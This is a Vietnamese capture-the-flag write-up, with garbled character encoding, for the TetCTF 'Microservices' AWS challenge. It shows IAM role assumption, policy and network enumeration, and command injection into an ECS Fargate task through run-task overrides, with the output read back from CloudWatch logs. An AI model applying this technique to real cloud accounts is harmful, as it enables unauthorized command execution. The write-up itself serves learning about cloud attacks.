Microservices (200)
Bร i nร y chแป cho ta ARN Role, ฤแป tรฌm hiแปu ARN Role lร gรฌ vร cรกch dรนng nรณ nhฦฐ thแบฟ nร o, cรกc bแบกn cรณ thแป tham khแบฃo:
ฤแป sแปญ dแปฅng ฤฦฐแปฃc ARN Role mรฌnh sแบฝ assume role vแปi mแปt credentials bแบฅt kแปณ, mรฌnh sแบฝ sแปญ dแปฅng credentials ฤรฃ cรณ tแปซ bร i trฦฐแปc
Ta sแบฝ cรณ file configure nhฦฐ sau
Tแปซ config nร y mรฌnh sแบฝ assume role cho cloud1 cรณ thแป truy cแบญp ฤฦฐแปฃc resources mร role cho phรฉp vแปi cmd sau:
aws sts assume-role --role-arn arn:aws:iam::543303393859:role/TetCtf2Stack-EcsTaskRole8DFA0181-qubavXABtWiL --role-session-name test --profile cloud2
Khi cรณ ฤฦฐแปฃc key rแปi thรฌ configure nhฦฐ bร i 1 lร ฤฦฐแปฃc
ฤแบงu tiรชn mรฌnh check policy ฤแป xem mรฌnh cรณ thแป lร m ฤฦฐแปฃc gรฌ vแปi role ฤแป cho
โโ$ aws iam get-role-policy --role-name TetCtf2Stack-EcsTaskRole8DFA0181-qubavXABtWiL --policy-name EcsTaskRoleDefaultPolicy50882C77 --profile test
{
"RoleName": "TetCtf2Stack-EcsTaskRole8DFA0181-qubavXABtWiL",
"PolicyName": "EcsTaskRoleDefaultPolicy50882C77",
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Action": "ecs:RunTask",
"Resource": "arn:aws:ecs:eu-west-2:543303393859:task-definition/TetCtf2StackCtfTaskDefB40F186A:3",
"Effect": "Allow"
},
{
"Action": [
"iam:ListRolePolicies",
"iam:GetRolePolicy",
"ecs:ListClusters",
"ec2:DescribeSecurityGroups",
"ec2:DescribeSubnets"
],
"Resource": "*",
"Effect": "Allow"
},
{
"Effect": "Allow",
"Action": "iam:PassRole",
"Resource": [
"arn:aws:iam::543303393859:role/TetCtf2Stack-EcsExecutionRoleFD93B7A2-O8bY2QagMK25",
"arn:aws:iam::543303393859:role/TetCtf2Stack-CtfTaskDefTaskRoleD17F896A-vJxGKfIFhChH"
]
},
{
"Sid": "Statement1",
"Effect": "Allow",
"Action": [
"logs:GetLogEvents",
"logs:DescribeLogStreams",
"logs:DescribeLogGroups"
],
"Resource": [
"arn:aws:logs:eu-west-2:543303393859:*"
]
}
]
}
}Nhรฌn แป trรชn thรฌ ta biแบฟt ฤฦฐแปฃc:
Ta cรณ thแป thแปฑc thi RunTask vแปi ECS
Ta cรณ thแป enum IAM vร EC2
Ta cรณ thแป thแปฑc hiแปn PassRole. Passrole lร tรญnh nฤng cho phรฉp cแบฅp quyแปn cho user truy cแบญp ฤแบฟn role mร cแปฅ thแป แป ฤรขy lร 2 role
role/TetCtf2Stack-EcsExecutionRoleFD93B7A2-O8bY2QagMK25vรrole/TetCtf2Stack-CtfTaskDefTaskRoleD17F896A-vJxGKfIFhChHCuแปi cรนng ta cรณ thแป check logs (lรบc nร y mรฌnh khรดng rรต log nร y lร log gรฌ)
Note: ฤแป รฝ kแปน thรฌ mแปi action mร ta cรณ quyแปn thแปฑc hiแปn ฤแปu cรณ region lร eu-west-2 . Do ฤรณ ta phแบฃi configure region lแบกi thร nh eu-west-2
Mรฌnh sแบฝ ฤi vร o tแปซng chแปฉc nฤng tแปซ trรชn xuแปng.
ฤแบงu tiรชn ta cรณ thแป thแปฑc thi ecs:Runtask, cรกc bแบกn cรณ thแป tรฌm hiแปu thรชm vแป ecs service trong aws tแบกi ฤรขy
Nรณi cho dแป hiแปu thรฌ ecs lร service cho phรฉp quแบฃn lรฝ cรกc docker container trรชn amazon cloud, mแปi container sแบฝ cรณ nhiแปm vแปฅ riรชng, ta gแปi lร task, nhiแปu container sแบฝ ฤฦฐแปฃc sแปญ dแปฅng kแบฟt hแปฃp vแปi nhau ฤแป cแบฅu thร nh service (ฤรณ cลฉng chรญnh lร lรฝ do vรฌ sao bร i nร y tรชn lร Microservices)
ร tฦฐแปng ฤแบงu tiรชn cแปงa mรฌnh lร gแปi ฤฦฐแปฃc task vร tรฌm hiแปu hร nh vi cแปงa nรณ ฤแป lแปฃi dแปฅng. Vแปi chall nร y ฤแป gแปi ฤฦฐแปฃc task thรฌ ta cแบงn
--task-definition : ฤรฃ biแบฟt
--cluster : cรณ thแป lแบฅy bแบฑng
ecs:ListClusters(cluster cรณ thแป hiแปu ฤฦกn giแบฃn lร mแปt goup cแปงa cรกc containers)--network-configuration : ta cลฉng cรณ ฤแปง thรดng tin cho options nร y
Lแบฅy Cluster name
Format cแปงa --network-configuration cรณ dแบกng nhฦฐ sau:
Ta dแป
dร ng lแบฅy ฤฦฐแปฃc qua ec2:DescribeSecurityGroups vร ec2:DescribeSubnets
GroupId
โโ$ aws ec2 describe-security-groups --profile test
{
"SecurityGroups": [
{
"Description": "Security Group for CTF ECS tasks",
"GroupName": "TetCtf2Stack-CtfSecurityGroupA7633774-1DAGZMZKB7EY4",
"IpPermissions": [],
"OwnerId": "543303393859",
"GroupId": "sg-0f6583e3532e99a62",
"IpPermissionsEgress": [
{
"FromPort": 252,
"IpProtocol": "icmp",
"IpRanges": [
{
"CidrIp": "255.255.255.255/32",
"Description": "Disallow all traffic"
}
],
"Ipv6Ranges": [],
"PrefixListIds": [],
"ToPort": 86,
"UserIdGroupPairs": []
}
],
"Tags": [
{
"Key": "aws:cloudformation:stack-name",
"Value": "TetCtf2Stack"
},
{
"Key": "aws:cloudformation:logical-id",
"Value": "CtfSecurityGroupA7633774"
},
{
"Key": "aws:cloudformation:stack-id",
"Value": "arn:aws:cloudformation:eu-west-2:543303393859:stack/TetCtf2Stack/54b3d720-bc03-11ee-9235-06cbbf25eaf7"
}
],
"VpcId": "vpc-07e8cd02a7c992f43"
},
{
"Description": "default VPC security group",
"GroupName": "default",
"IpPermissions": [
{
"IpProtocol": "-1",
"IpRanges": [],
"Ipv6Ranges": [],
"PrefixListIds": [],
"UserIdGroupPairs": [
{
"GroupId": "sg-2a62a941",
"UserId": "543303393859"
}
]
}
],
"OwnerId": "543303393859",
"GroupId": "sg-2a62a941",
"IpPermissionsEgress": [
{
"IpProtocol": "-1",
"IpRanges": [
{
"CidrIp": "0.0.0.0/0"
}
],
"Ipv6Ranges": [],
"PrefixListIds": [],
"UserIdGroupPairs": []
}
],
"VpcId": "vpc-5744993f"
},
{
"Description": "default VPC security group",
"GroupName": "default",
"IpPermissions": [],
"OwnerId": "543303393859",
"GroupId": "sg-0e0be2c862c2b3241",
"IpPermissionsEgress": [],
"VpcId": "vpc-07e8cd02a7c992f43"
},
{
"Description": "GET FLAG",
"GroupName": "TetCTF-GETFLAG",
"IpPermissions": [],
"OwnerId": "543303393859",
"GroupId": "sg-0636ad23bae6f21e7",
"IpPermissionsEgress": [
{
"IpProtocol": "-1",
"IpRanges": [
{
"CidrIp": "0.0.0.0/0"
}
],
"Ipv6Ranges": [],
"PrefixListIds": [],
"UserIdGroupPairs": []
}
],
"VpcId": "vpc-07e8cd02a7c992f43"
}
]
}Lฦฐu รฝ: ta sแบฝ dรนng GroupID cแปงa GroupName TetCTF-GETFLAG lร sg-0636ad23bae6f21e7 . Lรฝ do thรฌ sแบฝ biแบฟt sau
SubnetId
Thแปฑc thi ecs:RunTask
Tuy nhiรชn vแบซn chฦฐa ฤฦฐแปฃc vรฌ cรฒn thiแบฟu gรฌ ฤรณ, sau mแปt hแปi search gg thรฌ mรฌnh biแบฟt cรณ 3 mode ฤแป tแบกo instance cho container lร EC2, FARGATE vร EXTERNAL. ฤแปi vแปi bร i nร y thรฌ chแป cรณ FARGATE lร cรณ thแป run task
โโ$ aws ecs run-task --task-definition TetCtf2StackCtfTaskDefB40F186A:3 --cluster CtfEcsCluster --network-configuration "awsvpcConfiguration={subnets=[subnet-05dc4f12caf437c48],securityGroups=[sg-0636ad23bae6f21e7]}" --launch-type FARGATE --profile test
{
"tasks": [
{
"attachments": [
{
"id": "30cb9cbf-cfa7-4ac6-be42-5dcf94e0bb6a",
"type": "ElasticNetworkInterface",
"status": "PRECREATED",
"details": [
{
"name": "subnetId",
"value": "subnet-05dc4f12caf437c48"
}
]
}
],
"attributes": [
{
"name": "ecs.cpu-architecture",
"value": "x86_64"
}
],
"availabilityZone": "eu-west-2a",
"clusterArn": "arn:aws:ecs:eu-west-2:543303393859:cluster/CtfEcsCluster",
"containers": [
{
"containerArn": "arn:aws:ecs:eu-west-2:543303393859:container/CtfEcsCluster/cf2c5c1b8c0041b699078d1aeb485503/2e74da1d-75b0-4614-8804-0d7681daca30",
"taskArn": "arn:aws:ecs:eu-west-2:543303393859:task/CtfEcsCluster/cf2c5c1b8c0041b699078d1aeb485503",
"name": "CtfContainer",
"image": "543303393859.dkr.ecr.eu-west-2.amazonaws.com/tet-ctf:flag",
"lastStatus": "PENDING",
"networkInterfaces": [],
"cpu": "0"
}
],
"cpu": "1024",
"createdAt": 1706716630.41,
"desiredStatus": "RUNNING",
"enableExecuteCommand": false,
"group": "family:TetCtf2StackCtfTaskDefB40F186A",
"lastStatus": "PROVISIONING",
"launchType": "FARGATE",
"memory": "2048",
"overrides": {
"containerOverrides": [
{
"name": "CtfContainer"
}
],
"inferenceAcceleratorOverrides": []
},
"platformVersion": "1.4.0",
"platformFamily": "Linux",
"tags": [],
"taskArn": "arn:aws:ecs:eu-west-2:543303393859:task/CtfEcsCluster/cf2c5c1b8c0041b699078d1aeb485503",
"taskDefinitionArn": "arn:aws:ecs:eu-west-2:543303393859:task-definition/TetCtf2StackCtfTaskDefB40F186A:3",
"version": 1,
"ephemeralStorage": {
"sizeInGiB": 20
}
}
],
"failures": []
}Sau khi gแปi ฤฦฐแปฃc task thรฌ mรฌnh bรญ hoร n toร n khรดng biแบฟt lร m gรฌ tiแบฟp theo
Nhแป lแบกi ฤแป cรฒn cho phรฉp mรฌnh PassRole vร xem logs, nรชn mรฌnh check lแบกi cแบฃ 2, thรฌ kแบฟt quแบฃ tแปซ logs cรณ vแบป khรก khแบฃ quan
Mรฌnh nhแบญn thแบฅy sแบฝ cรณ logs ฤแปi vแปi /ecs/tet-ctf:* , hay chรญnh lร task mร mรฌnh thแปฑc thi, thแปญ thแปฑc thi task vร check logs ta sแบฝ ฤฦฐแปฃc (nแบฟu ta gแปi task khรดng phแบฃi bแบฑng GroupID cแปงa TetCTF-GETFLAGthรฌ ta sแบฝ khรดng thแบฅy logs)
ฤแบฟn ฤรขy mรฌnh tiแบฟp tแปฅc bรญ vร khรดng biแบฟt phแบฃi lร m gรฌ vแปi ฤแปng logs nร y
Quay trแป lแบกi vแปi hร nh vi run-task, mรฌnh thแบฏc mแบฏc khรดng biแบฟt liแปu cรณ mแปt tรญnh nฤng nร o ฤรณ cรณ thแป giรบp thแปฑc thi command hay khรดng. Search cแบฃ ngร y trแปi khรดng ra kแบฟt quแบฃ, nhฦฐng khi hแปi ChatGPT thรฌ mรฌnh cรณ cรขu trแบฃ lแปi ๐ข๐ข๐ข
Options --overide sแบฝ cho phรฉp ta ghi ฤรจ command sแบฝ thแปฑc thi kรจm vแปi quรก trรฌnh khแปi tแบกi cแปงa container. Tuy nhiรชn cmd thแปฑc thi khรดng trแบฃ vแป output
โโ$ aws ecs run-task --task-definition TetCtf2StackCtfTaskDefB40F186A:3 --cluster CtfEcsCluster --network-configuration "awsvpcConfiguration={subnets=[subnet-05dc4f12caf437c48],securityGroups=[sg-0636ad23bae6f21e7]}" --launch-type FARGATE --profile test --overrides '{"containerOverrides": [{"name": "CtfContainer", "command": ["id"]}]}'
{
"tasks": [
{
"attachments": [
{
"id": "d39de2d8-14a4-42eb-934b-bef7704c3dc5",
"type": "ElasticNetworkInterface",
"status": "PRECREATED",
"details": [
{
"name": "subnetId",
"value": "subnet-05dc4f12caf437c48"
}
]
}
],
"attributes": [
{
"name": "ecs.cpu-architecture",
"value": "x86_64"
}
],
"availabilityZone": "eu-west-2a",
"clusterArn": "arn:aws:ecs:eu-west-2:543303393859:cluster/CtfEcsCluster",
"containers": [
{
"containerArn": "arn:aws:ecs:eu-west-2:543303393859:container/CtfEcsCluster/eecf1f8af5c24f34be5bc4507c837909/7bc76a3c-9f5b-4e1a-a8e8-bcc9dd1a3c5e",
"taskArn": "arn:aws:ecs:eu-west-2:543303393859:task/CtfEcsCluster/eecf1f8af5c24f34be5bc4507c837909",
"name": "CtfContainer",
"image": "543303393859.dkr.ecr.eu-west-2.amazonaws.com/tet-ctf:flag",
"lastStatus": "PENDING",
"networkInterfaces": [],
"cpu": "0"
}
],
"cpu": "1024",
"createdAt": 1706716669.563,
"desiredStatus": "RUNNING",
"enableExecuteCommand": false,
"group": "family:TetCtf2StackCtfTaskDefB40F186A",
"lastStatus": "PROVISIONING",
"launchType": "FARGATE",
"memory": "2048",
"overrides": {
"containerOverrides": [
{
"name": "CtfContainer",
"command": [
"id"
]
}
],
"inferenceAcceleratorOverrides": []
},
"platformVersion": "1.4.0",
"platformFamily": "Linux",
"tags": [],
"taskArn": "arn:aws:ecs:eu-west-2:543303393859:task/CtfEcsCluster/eecf1f8af5c24f34be5bc4507c837909",
"taskDefinitionArn": "arn:aws:ecs:eu-west-2:543303393859:task-definition/TetCtf2StackCtfTaskDefB40F186A:3",
"version": 1,
"ephemeralStorage": {
"sizeInGiB": 20
}
}
],
"failures": []
}Mรฌnh check thแปญ OutBound thรฌ cลฉng khรดng cรณ kแบฟt quแบฃ (quรก dแป ฤoรกn)
Lรบc nร y thรฌ logs phรกt huy cรดng dแปฅng, mรฌnh thแปญ check logs vร cรณ ฤฦฐแปฃc output
Viแปc bรขy giแป chแป lร tรฌm flag thรดi
Last updated